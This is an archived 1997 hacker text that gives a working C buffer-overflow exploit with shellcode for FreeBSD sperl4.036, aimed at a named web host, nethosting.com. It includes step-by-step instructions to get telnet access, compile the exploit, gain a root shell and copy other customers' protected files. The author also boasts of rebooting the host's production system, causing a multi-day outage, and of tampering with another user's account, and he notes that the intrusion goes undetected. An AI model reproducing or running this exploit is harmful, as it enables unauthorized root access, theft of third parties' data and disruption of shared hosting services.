Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: lsneth~1.txt

Hacking nethosting.com by Lord Somer




          //------------------------------------------------\\
          ||  Get Read/Write/Reboot/Shutdown access to the  ||
          ||   entire nethosting.com system including all   ||
          ||            231 of its subdomains!              ||
          ||   By: Lord Somer(webmaster@lordsomer.com)      ||
          ||               on August 4, 1997                ||
          ||  For: The Hackers Layer                        ||
          ||       http://www.lordsomer.com                 ||
          ||             and                                ||
          ||       The Hackers Club                         ||
          ||       http://www.hackersclub.com/km/index.html ||
          \\------------------------------------------------//

Well Recently I was Logged into a nethosting.com account on telnet
reconfiguring my eggdrop bot, and I found the file perl.c(including below)
and thought to myself what might this be so I grabbed a copy for myself
and it said it was a sperl exploit and not much else, so I figured what the
hell lets test this sucker, so I ran it low and behold root access sorta
you have permission to do everything but addusers(go figure!), so just to
make sure it wasn't bullshit I did a reboot on the sys hence the system
outage on 8/2-8/3 for many domains including hawkee.com(more on this later).
Well when it finally came back online amasingly, I decide to do more probing
after running that exploit again, I decide what the hell lets do a test so
I go into TwoSlows accounts dir(yes he's on there) and make a nice dir called
suptwoslow for him and he confirmed that it was in his account, thus proving
that you get world read/write/reboot/shutdown.  If anyone figures out how
to addusers on this sys let me know.
Ok enough of the stories on with the instructions...
First Make a new text file and name it perl.c, and cut/paste the below part
minus the 2 --- lines seperating it out.

----------------------Begin Perl.c---------------------------------

/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0+1;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768+1);
        memcpy(&buf[768+1],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}
--------------------------End Perl.c------------------------------------

ok well your gonna need telnet access for this sucker to work, hmm who to 
get that from? well only the domains owners that are hosted on nethosting
have this access so offer them a deal you'll show em how to do this.
A few People To ask might be:
www.hpvca.com
www.warez950.org
www.7thsphere.com
www.lgn.com
www.hawkee.com
Ok so by now you've gotten telnet access to the sys.
which means your got ftp also, so ftp in to the account and upload perl.c
then logout of ftp, and telnet in, cd to the dir you up'd perl.c to.
Type cc perl.c
then ./a.out
type those exactly and hit enter after each one.
your command prompt should change to a #
type whoami
should respond root
well there ya have it feel free to do what ya like.
oh yeah and say you hit someone like hawkee.com's cgibin dir, he has blocked
group ftp access to this dir, oh shucks ya say.  Eh easy as pie to solve
in the account you have ftp access to make a temp dir to copy the shit ya 
want to. get the full patth to it like /usr/home/sucker.com/temp
k,
back in the shell(after running exploit) go to dir ya wanna steal and type
cp * /path/to/temp/stealing/dir

Enjoy, and hope ya can get on considering nethosting.com is down 80% of the
time.  Oh and also nethosting.com is also eggable, wanna know how to install
eggdrop just read my guide at http://www.lordsomer.com/eggdrop.html

1 Great thing about this exploit is, nethosting.com cant tell you have root
access, since it still looks like you are the user you logged in with.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH